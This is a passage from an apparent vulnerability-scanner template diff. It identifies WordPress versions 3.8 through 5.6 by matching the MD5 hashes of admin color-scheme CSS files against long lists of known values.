dsl: + - "(\"7386ebd85ed17227277f38bf986ec649\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"27c54160898b88b4dd86baa0c0618d1a\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"9e8cdcc5820931f3324339f6ec30bdcb\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"94457336df384eee6f64773fa914a609\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"e0541afbb33bc7389acc383dfdd91819\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"c4229460e28195d59dadc5927b591ef3\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"145d2df39b9a8604db59465b36b081b6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"aecd603f94e7bbd2ef18fd360bb6652d\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"b57d5dd40e05c32a431749322009f234\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"52b7e848e2bb6607b4e714ce168d335e\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"3b1b999fc3b428d847eff0cc1008c21e\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"e12dc487d41f9eb74752df4e280e69f2\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"ac60e49d77c6b5245f56a5221d1fadf5\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"12e96ecc678c3dce24ea3ff7351b8767\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"9421a5f0d00af3d1205fd185c1cdf61b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/midnight/colors-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"ecb168ac881b1974386d6722018589df\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"6bbde2ec66d17f54b8ce67e0519310c8\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"45a1dc3597f440d818d7adaaec694a3d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"c1724aa74b85565ad129608093d951a7\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"46d38df7939457add9e0cb01862625fd\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"bcbc1b8d22c46e76d9a39507376b81c5\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"ed5bc7004a118f6b9b4fddeb82d9d78a\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"01177358c121a44d888428eb66a3fdce\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"5f2622d75f92cd287dadd410b99aba43\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"949cb3874d4150bf45d54d02f108bc1d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"16de8dbce800ca3a800c5a27a85c9adb\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"faad862c1c60e1afe18e910b2a56f886\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"456fa1aacdc754b7e61e1b8e32411a15\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"3df2f7e94dc064133dce5ecca4a705d2\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"41dbb400a0c7f340a9c93ec5530fc138\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"73b50e985b5ddbe2afdf3e60fe3c91e9\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"13a62affb19421a576f61b45959ad2c8\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"ce815c6eedce1fe226862aa2465f7b07\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"ae10dfdf20966c5a31ab73f6045dfb36\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/midnight/colors.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"ec678f19e1681ae3cfc6cc15d1b0a128\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"9757ca09dddfa5a983e2b25f826a96ca\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"fc8831d91e726e0f99730adde37e9175\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"29888360ce68d130f41ed391bd647ab3\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b048ef915d1fa35107bc54d96bdca463\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"229cd304fee2141d2b8ac2be3002fbdd\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"c09c501be59486f3a7ec42c322e929cc\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"05b8d5e2e09cb5ec16cb2991c857719c\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"22803a84f503c895cc540b01da3c8059\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"3c8eb91438052ad8ed3e5c407bb46871\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a58fdad36db9fddd391c6960b8cff21c\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e03f63363d23a124c1940a6a9c657441\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"0c0eaf1b7049bacb2efcf7a5bd5b9669\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"10ea1bb4f8fb13aaa4aadf13744d4410\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"580dc16a24cd582e8afaee49d73dcf7e\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"3e5b7d16274bc2b3f7ee49a35652af36\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"95098be791e68f428e6a0b0f6cdae29b\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"b6940b5dad3790211178cde06f029e59\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"4909e03ca72e1fe17343df6135f57091\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/coffee/colors.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"31f8a34795536919f4d903f31b2c2abf\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"2bd83c43aed60c175a0f8c5d2738639b\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"f032e42bc6cb2033bfde657c7494337e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"dba131a88a68e7acbb7b3cec28db1dcb\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"46a337f2ec44eb87918c06bc84f82a55\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b4cd3218e3c6e52336a8da60cf847d4c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"594f599a5d8f91d07fc0f317117561a7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"1e500dd63ae97e399dbd6cee43d72ec8\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"2208e58ad099a1ce01177a1a7e6f3190\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"0ad4b42efbdb5ad11a01ebb7dc75178a\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"059a5265a9a022fa492324fb90341055\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"263d280c18ac772f266f0985ae36973a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"aa969b60bb26bcbd12d6a33f9b831475\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"20d616b7596b9f004dbdee4875d60d85\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"dd7a1f669975f835a5463265fcbf228c\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"7e6bd22f6f3f59a6bb67cfb0a07724b5\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"fb9e5d2fa6a3a341c965a0df67cd5c20\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"4383fff6b3f7a39f54c8d4ea2e96fbf5\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"e8e158e8c1e00d330901a6c0551b640d\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"d344cf96de87c8ade83fd1680ee9fa21\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/coffee/colors-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"e990ccbcd406eb7639db1966040a4169\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"74dab612b62647eeac56102d9fded496\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"7a6adb6f93ebe47bb2a49bac118ffe24\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"6509268c1c5e84a108c0030e7f1e8eed\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"b8a702008f8b8b1a38b0a2ef37723c6e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"2272c3bc872bdcce77a6b8d0ec902701\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"4660617cfae6b1ec687fe800ea238cd5\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"2a31c90c6060eb8c9b696e90455d31d5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"d2b89a3e73c87b9c39794a4bf201dbb7\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"374ddd0bfada7b8e7e08c3ad75e719c6\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"e1f8d2bad643e1a93cc9f2d5908e60aa\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"f8fe8659b15b8e5ee7c5bfd9aa067b73\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f15d9c97b13b36e554fc800efe93b368\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"4bf44f2d95e5e446d85aeeffe626e135\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"b783d66f5de1122b846fccc7f2caace7\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"7c55de81d6e8396466061214d797db17\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"7229d3fc179243a547504368f3516128\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"68bc26788771128a9d2c94547a6cf568\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"fa7fa07fb1b4e8f58ec2a0a310171aa6\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"0f2dd46bb4fc24d6f3a8aef983cb90cc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ocean/colors.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"42686d5afca9aeb0ac4b04b6c35df0e7\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"3a51a395483d77757c9e1d236651417b\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"d04d8dba0a8390d11aafe4f5a03dc972\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"66a395bc778d300fc5f0b2d77daa1fbd\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"744e9c6c33a37d9db3ad2f57318efa09\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"58be4f65a594e084222693e8fba9867e\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"6882c09b189df57714ce0dbf7634d0b6\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"3b3f6318207f03b0ed86af7b1c4529a4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"02fc9e590e7423aba6c478c4782d07bd\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"c414758f69c13dff67ef7ce2b57350bf\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"7434d42be65938ef44ee3a474ccf72dd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"df4944e91c7bbe26599df8827fc4b142\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b4a5193ac0855c1ee4581034b950c5d3\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"114677d80b4276c22ccd8558a39e3399\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"81e903a56357b68812980d1e26dabd97\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"2ba44c4cfab37459e99c503bcfbe6549\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"4290f926950485af972020a1c2e17bdd\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"33af6a595d5d60440c80fa0acefde63c\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"08a72f44a7ba011db56013197d1e84c9\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"6a70ed7d062bd418c3ecc45126d9e047\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ocean/colors-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"3942519c51eac40a974afe4e692311a9\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"0d868fe77c55aa8086815541a5febdf5\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"f8b49360db7b06106c295535de575d1f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"6803f9cacd5c572ea07a6191c6b3a955\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"e6e9cf722d8de33ad8061c14181b9d02\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"83320550041b6ac4a3b224f8cd66a156\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f3f1049fff65b59b6ee73c8324a06d6b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"8391fa695eb835e0e2c9058881359ac4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"df07ae9eb80c843ee9851cc07c745a6b\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"3b9137f812aa6cf6a5038fd0e8cbd68c\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"9a55f6f39ed642323724a678c9cfa4b5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8bef0b039c5cc85393c4f82a39ebe1eb\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"8cfd80664f79160c558113bdc45f66f8\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"ac9b85a8997fad0424ed768c8b3a7fab\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"ddd584a26b38564d2bffe96173cc0fdb\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"5a07925c796f75ebb2481b73dbf50e28\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"0cf2e52c89e754af7315d139c676b42b\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"4618abb323cd6804dd9602b097eb01d5\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"c56df1affc4b4d719a6961d1ab11c67d\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"a19b01302b963beb183ae967896f4c1a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ocean/colors-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"e6c6ccbf9d3324987324ed2802a695de\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"124e45c18cfbd0d1c69dbb6e6cbcbd72\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"22dbd1fcd0396ec5d53b9ac70986ce4d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"6aa2e9fb264e5c58d2a755d1b09cdad2\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"9b6c0b762c7c8c9edb0fdf22fd85084f\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"10aec0930bf49892f26ae12a2161d9f5\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"f8efb32e4c1bfdc779625bfab3ef29f5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"054be6e2d37a4035c4f1f2fac9ca6071\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"6d2aa9063ac3cd5e37c836d8e4e6ac1c\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"ff093ff18aef2de35d910e9bc7300a63\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"f26236f80294976fd03cd01ea7c119de\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"2045d8aca5c756472323069740e9d9ec\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"aa4bf2f4b402f8118a05f003f6b3ed10\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"0178835344242e30c4d31e3929ad8277\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"e28e04ceb70d5482bb78052f6185a4f3\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"3a9c2e1817bfe75b9f3ca3dc73727ec2\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"f01b1c814f1b4e0889587391222ce56f\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"84becdf4915595c2ee74a32b8c98d982\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"4ff67a17f525872e5810c7433ef3ecab\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ocean/colors.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"6def631dce1084cd5e47ec236997ac76\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"eb668f9051822ba6ba7d0730fc7c7ab5\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"4ed0de0e34ed26b0cba26e9845c4b6a3\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"9533bb981ce46f45ce5d8359112e400e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b020388806a04a345a11b54a667b0f0a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"6e1c9ca18902b56c36af3e28246eeac7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"5a9b0f003097c036cd9652b97ae58b5e\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6d9237b9422cde63ae1b46d65e92c4ec\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"f6d59352fe85ef21f18a00b92507a1cf\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"30f1caf5ac1ca40c859539bbf81e439e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"eee72a2f2014c3d8f615a9284f5c5aac\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f73f4774e692b7fb4c9cadbe6d1cb18b\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"afa8cd3fc9d22defe9b2b195627e909a\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"f1511382ee737a33ca146addbd855607\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"f811888802876ed3ed6ca1b1f4f1dbab\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"b4efb3e7744d0a1e70748138da9e6804\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"04f9105a8b65245cf22080dca66382f8\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"6d1097917d04a4ac0aaa1bd08fa4943c\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"c17b036935ef47a816c90b5faa543c0e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/light/colors.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"3b42ed8f88b3504e85fa6c9bcffc7d68\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"b0a2e41cc8e4fc1d20b51923cc1412b6\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"85e47a254d85f992643bdc75f3f130bc\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"37b13af5b2d2fe92bda3ea34734fa727\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"e4022388c07ee804bd347f23e1662158\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"25e706f4ca9277b6f5c09ec85e8360ac\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"2297575ac6851b541ef9f8797d318ec2\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"347944869f261dbbbd1d39e466652be3\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"2bffe9b64cd0f84a079fc09708785026\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"3dc722ed8881be9e50c0889a8c6dcc70\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"2e105d8125f21fa58ebd346a11e9efcc\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"24ce38778beaf7899914f079cc6e1bd7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"a27f248d1478b01d1fbdaff924a9c9d9\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"d91432b5b30c8a375f88a2476fb83953\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"75aa2db229bd2da0e80af17e8b1eee7a\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"e1d733902309caf84b473f3d0ac2d846\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"367b273fcbf2e1018eef5046fd93149d\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"f5df1e2a1d7db3ee134cd4259e7f0f8e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"9976161dacac2691db0c1ab9d9f64928\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/light/colors-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"6f8cbadd7a62e47b10fd1fa31ade20bd\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"f60e0eb47f81bbc633a19b19e6cf6f7b\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"8753f151ad2a1db9d6a51f3825986c45\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"b4be2184e5b0187f52904e43be7cbb8e\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"47089b7b3f48af038d9731dcd450da3b\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ca985fbb17060a4a54e0c2b9c9e4c54a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e3ceeb9466bd89ba5ee791130f9ca85f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"9d2aa89b387842aab22c1403ada1ad30\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"74c24051404a9db46da1792f4f3eab02\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"d1d45cb5385dc3a0dda32b2339b660aa\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"f1ee0df10cdc3a4308768472cc3e8667\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"cfa4791d5201633ce396fea1d3c25218\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"cc5ba6eaf7d90ccab5fd1a705d0b57e7\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"34c7ecd41abb111fdd058dffd0de8751\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"7e659847f1761bde89f2090ff4675d49\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"7e9d6252fd84110298fc42e80f31c4b1\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"9396d21e0d8b5e06542871200176f303\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"2cf260411296203c7fce4e25140923db\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"cba6790eb8274eb25b2e3f15a77c519e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/light/colors-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"d12c6321c2905a72081e07d1f3696532\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"22a8f413fe68dd3e05d11127d089985e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"1bdecd78f1ec3604f202995e0785e120\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"6e8c045bd416f95339a55569ea56af50\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"14e0f61252198b7f5bc6b3954f86495c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"135321308e0cff17720381814fe670fe\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"9b5e58edb3659476950318940d69673e\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"168ab9cfc76d472aa3b19a18b66c1e05\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"0924761e149d1a02d724234b8eb7fdd5\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"862cede744447240baa0e2c7c6014eb3\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"205693de99633c27a39d0c1783b792e3\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e24995d6dd77c3de2e2a76bdee5878f8\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"5f9aeafda976bdcac79c9eb792607eb4\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.33 + dsl: + - "(\"59f2d58002bce3c1c231f856821cdda4\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"d0c2fc2631752d6d9fbb17bac33b0a0e\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"6ac1f0dff2731afc92b387bf90bcbfe4\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"f84934b18bba2ef7087435a63cc7d823\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + 